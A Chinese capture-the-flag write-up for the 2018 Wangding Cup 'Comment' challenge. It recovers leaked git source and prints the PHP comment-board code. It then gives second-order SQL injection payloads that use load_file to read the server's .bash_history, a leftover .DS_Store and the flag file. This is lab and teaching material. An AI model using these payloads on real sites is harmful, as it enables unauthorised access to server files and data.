[网鼎杯 2018]Comment

dirsearch扫目录发现.git泄露，用githack还原git文件。网上lijiejie的那个githack是不能做这道题的，出现如下的GitHack图标的才是真的。

git clone git://github.com/BugScanTeam/GitHack

直接下载下来的源代码文件是不完整的，进入到扫描目录下

git log --reflog

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

源代码：

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

最后构造出来的sql语句就是

$sql = "insert into comment
            set category = '', content=user(),/*  
                content = '*/#',
                bo_id = '$bo_id'";

可以看到我们已经查询出来当前用户是user，接下来用loadfile读取历史操作，', content=load_file('/home/www/.bash_history'),/*

把html.zip解压以后复制到/var/www，虽然最后删除了/var/www/html里的DS_Store，但是/tmp下的没有删。用hex编码：', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
结果用burpsuite的decoder查看，可以发现flag_8946e1ff1ee3e40f.php文件

真正的flag在var/www/html下，',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*